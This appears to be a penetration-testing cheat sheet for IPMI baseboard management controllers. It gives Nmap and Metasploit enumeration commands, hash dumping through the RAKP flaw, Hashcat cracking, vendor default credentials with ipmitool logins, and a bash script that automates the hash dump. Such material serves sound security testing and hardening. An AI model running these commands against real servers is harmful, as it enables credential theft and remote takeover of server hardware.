IPMI
Table of Contents
- Introduction to IPMI
- Enumeration Techniques
- Advanced Techniques
- Exploitation Scenarios
- Combining Tools
- Glossary
Introduction to IPMI
Overview of IPMI
The Intelligent Platform Management Interface (IPMI) is a set of standardized specifications for hardware-based host management systems. It provides administrators with the ability to manage systems remotely, even if the host is powered off or unresponsive.
Core Features:
- Remote BIOS settings modifications.
- System power management (reboot, shutdown).
- Hardware monitoring (temperature, voltage, fan status).
Key Components
| Component | Description |
|---|---|
| Baseboard Management Controller (BMC) | A microcontroller for managing and monitoring system hardware. |
| Intelligent Chassis Management Bus (ICMB) | Enables communication between chassis systems. |
| IPMI Memory | Stores logs, repository data, and event logs. |
| Communication Interfaces | Includes local system interfaces, serial/LAN interfaces, and PCI Management Bus. |
Default Configuration
- Port: UDP 623.
- Authentication: Defaults to weak credentials or factory-set passwords.
- Common BMC Implementations: HP iLO, Dell DRAC, Supermicro IPMI.
Enumeration Techniques
Nmap Service Discovery
Identify IPMI services and gather version details.
Command:
nmap -sU --script ipmi-version -p 623 TARGET_IP
Example Output:
PORT STATE SERVICE
623/udp open asf-rmcp
| ipmi-version:
| Version: IPMI-2.0
| UserAuth: auth_user, non_null_user
|_ PassAuth: password, md5, sha1
Metasploit IPMI Scanner
Use Metasploit’s auxiliary modules to enumerate IPMI services.
Command:
use auxiliary/scanner/ipmi/ipmi_version
set RHOSTS TARGET_IP
run
Example Output:
[+] TARGET_IP:623 - IPMI - IPMI-2.0 UserAuth(auth_user, non_null_user) PassAuth(password, md5, sha1)
Advanced Techniques
Dumping IPMI Password Hashes
Leverage IPMI’s RAKP protocol flaw to retrieve password hashes.
Metasploit Module:
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS TARGET_IP
run
Example Output:
[+] TARGET_IP:623 - IPMI - Hash found: ADMIN:8e160d4802040000205ee9253b6b8dac3052c837e23faa631260719fce740d45c31
Offline Password Cracking
Extracted hashes can be cracked offline using tools like Hashcat.
Hashcat Command:
hashcat -m 7300 ipmi_hashes.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u
Explanation:
-m 7300: Specifies IPMI hash type.-a 3: Uses brute-force mode.?1: Represents a set of uppercase letters and digits.
Exploitation Scenarios
Default Password Exploitation
Many BMCs use weak or factory-set default passwords. Test the following common credentials:
| BMC Type | Default Username | Default Password |
|---|---|---|
| Dell iDRAC | root |
calvin |
| HP iLO | Administrator |
Randomized (8 chars) |
| Supermicro IPMI | ADMIN |
ADMIN |
Command:
ipmitool -H TARGET_IP -U ADMIN -P ADMIN -I lanplus power status
IPMI Configuration Weaknesses
Exploit weak configurations, such as no network segmentation or lack of encryption.
Example:
-
Retrieve IPMI system logs:
ipmitool -H TARGET_IP -U ADMIN -P ADMIN -I lanplus sel list -
Use the obtained logs for further enumeration.
Combining Tools
Using Nmap with Metasploit
-
Discovery with Nmap:
nmap -sU --script ipmi-version -p 623 TARGET_IP -
Exploit with Metasploit:
use auxiliary/scanner/ipmi/ipmi_dumphashes set RHOSTS TARGET_IP run
Automating with Scripts
Automate IPMI enumeration and exploitation using bash.
Example Script:
#!/bin/bash
nmap -sU --script ipmi-version -p 623 $1
msfconsole -x "use auxiliary/scanner/ipmi/ipmi_dumphashes; set RHOSTS $1; run"
Glossary
| Term | Definition |
|---|---|
| IPMI | Intelligent Platform Management Interface for remote server management. |
| BMC | Baseboard Management Controller, the hardware implementing IPMI. |
| RAKP | Remote Authenticated Key-Exchange Protocol, used in IPMI authentication. |
| LANplus | A secure IPMI communication protocol. |
| SEL | System Event Log, stores hardware and system events. |